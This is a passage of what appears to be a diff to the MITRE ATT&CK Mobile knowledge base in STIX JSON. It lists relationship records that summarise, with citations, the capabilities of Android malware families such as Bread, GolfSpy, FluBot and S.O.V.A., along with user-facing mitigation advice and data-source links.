"https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "modified": "2020-05-04T15:40:21.305Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) has utilized JavaScript within WebViews that loaded a URL hosted on a Bread-controlled server which provided functions to run. [Bread](https://attack.mitre.org/software/S0432) downloads billing fraud execution steps at runtime.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b9b9ce86-89f6-41ea-8ba1-9520985acb49", + "type": "relationship", + "created": "2020-12-24T22:04:28.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:28.004Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has checked for system root.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f4aeacef-035c-4308-9e85-997703e27809", + "created": "2020-01-27T17:05:58.305Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:27:33.906Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can delete arbitrary files on the device.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c943d462-fea7-4c01-88b2-de134153095b", + "created": "2023-03-20T18:56:37.473Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:56:37.473Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3c43d125-6719-420e-bb69-878cc91c2474", + "created": "2020-09-15T15:18:12.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:45:11.727Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can register for the `BOOT_COMPLETED` broadcast Intent.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e4beccfa-a9a5-447d-8164-d39a1b2c5532", + "created": "2023-02-06T19:46:43.041Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:46:43.041Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) has included adversary-in-the-middle capabilities.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--07dd3318-2965-4085-be64-a8e956c7b8da", + "type": "relationship", + "created": "2020-12-18T20:14:47.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.319Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has stored encoded strings.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4b68bcb1-a512-40f7-9aee-235b3668f022", + "type": "relationship", + "created": "2020-01-27T17:05:58.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.271Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain clipboard contents.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--42342d72-a37c-477e-b8f1-1768273fcb7f", + "created": "2019-10-18T15:51:48.451Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be advised not to grant consent for screen captures to occur unless expected. Users should avoid enabling USB debugging (Android Debug Bridge) unless explicitly required. ", + "modified": "2022-04-01T13:32:32.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c778593c-1583-48cc-a99d-0ac1b5b537e2", + "created": "2023-03-20T18:48:39.857Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:48:39.857Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ed7e9368-004c-484f-9eed-03b158325564", + "created": "2023-03-20T18:54:40.401Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:40.401Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--74c8c9e7-cd8b-4f3a-830d-a7e6e9668330", + "created": "2022-04-01T15:01:53.321Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can take appropriate action when jailbroken devices are detected, potentially limiting the adversary’s access to password stores.", + "modified": "2022-04-01T15:01:53.321Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--657f1d8c-3982-4ee5-95dc-c8ec3164cb2e", + "type": "relationship", + "created": "2020-07-15T20:20:59.382Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.382Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) has communicated with the C2 server over TCP port 7777.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b402664b-a5b4-45e4-832f-02638e6c67a7", + "created": "2022-04-01T14:59:17.991Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can take appropriate action when jailbroken devices are detected, potentially limiting the adversary’s access to password stores. ", + "modified": "2022-04-01T14:59:17.991Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ee9c1a8c-5f84-4571-8518-300a6412df0f", + "type": "relationship", + "created": "2019-09-23T13:36:08.448Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-10-15T19:56:50.651Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) collects information about the compromised device, including phone number, network operator, OS version, device model, and the device registration country.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--85e0d8c5-b9d6-4a10-963a-aeb54eba4f02", + "created": "2020-06-26T15:32:25.144Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint Cerberus", + "description": "A. Hazum, B. Melnykov, C. Efrati, D. Golubenko, I. Wernik, L. Kuperman, O. Mana. (2020, April 29). First seen in the wild – Malware uses Corporate MDM as attack vector. Retrieved June 26, 2020.", + "url": "https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:10:26.480Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) communicates with the C2 server using HTTP.(Citation: CheckPoint Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f32e107-aef9-42f8-84d1-4c4fcd863b7f", + "created": "2023-02-28T20:39:57.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:07:21.417Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use Domain Generation Algorithms to connect to the C2 server.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--29357289-362c-447c-b387-9a38b50d7296", + "created": "2022-04-15T17:20:06.338Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + }, + { + "source_name": "Check Point-Joker", + "url": "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", + "description": "Hazum, A., Melnykov, B., Wernik, I.. (2020, July 9). New Joker variant hits Google Play with an old trick. Retrieved July 20, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Bread](https://attack.mitre.org/software/S0432) uses various tricks to obfuscate its strings including standard and custom encryption, programmatically building strings at runtime, and splitting unencrypted strings with repeated delimiters to break up keywords. [Bread](https://attack.mitre.org/software/S0432) has also abused Java and JavaScript features to obfuscate code. [Bread](https://attack.mitre.org/software/S0432) payloads have hidden code in native libraries and encrypted JAR files in the data section of an ELF file. [Bread](https://attack.mitre.org/software/S0432) has stored DEX payloads as base64-encoded strings in the Android manifest and internal Java classes.(Citation: Check Point-Joker)(Citation: Google Bread)", + "modified": "2022-04-15T17:20:06.338Z", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f7bebe78-2e21-466d-878b-f70be6c0e94a", + "created": "2021-01-07T17:02:31.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:56:32.861Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can access the device's contact list.(Citation: Zscaler TikTok Spyware) ", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f92fe9dd-7296-42f6-904e-e245c438376e", + "created": "2020-12-14T15:02:35.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:25:06.012Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can request device administrator permissions.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--34b6abb0-d199-46bb-af21-b65560e75658", + "created": "2022-04-01T19:06:40.361Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T19:06:40.361Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "target_ref": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--90d4d964-efa2-46ac-adc2-759886e07158", + "created": "2020-10-29T17:48:27.325Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:11:02.157Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) has used HTTPS for C2 communication.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--18d3f4c7-2888-4d27-9ac7-b7ade1a1c04c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:23:04.150Z", + "description": "[Adups](https://attack.mitre.org/software/S0309) transmitted the full contents of text messages.(Citation: NYTimes-BackDoor)", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651", + "created": "2023-04-11T19:54:52.711Z", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T19:54:52.711Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can programmatically tap the screen or swipe.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d2a9348-5d0a-43b0-8776-e9bbddc659c7", + "created": "2023-03-20T18:48:56.995Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:48:56.995Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a82d3cfb-7ef2-4e39-a6e1-3097d7b106f7", + "type": "relationship", + "created": "2019-03-11T15:13:40.425Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Karl Dominguez. (2011, September 27). ANDROIDOS_ANSERVER.A. Retrieved November 30, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ANDROIDOS_ANSERVER.A", + "source_name": "TrendMicro-Anserver2" + } + ], + "modified": "2019-10-15T19:55:04.517Z", + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) gathers the device OS version, device build version, manufacturer, and model.(Citation: TrendMicro-Anserver2)", + "relationship_type": "uses", + "source_ref": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9c284d41-21ef-4009-bb47-3ae09b08f38d", + "created": "2022-04-01T17:06:06.950Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as access to location information. Users should also protect their account credentials and enable multi-factor authentication options when available. ", + "modified": "2022-04-01T17:06:06.950Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--828417ec-c444-41c8-95b4-c339c5ecf62b", + "created": "2022-03-30T20:48:00.360Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS users should be instructed to not download applications from unofficial sources, as applications distributed via the Apple App Store cannot list installed applications on a device.", + "modified": "2022-03-30T20:48:00.360Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_attack_spec_version": "2.1.0", 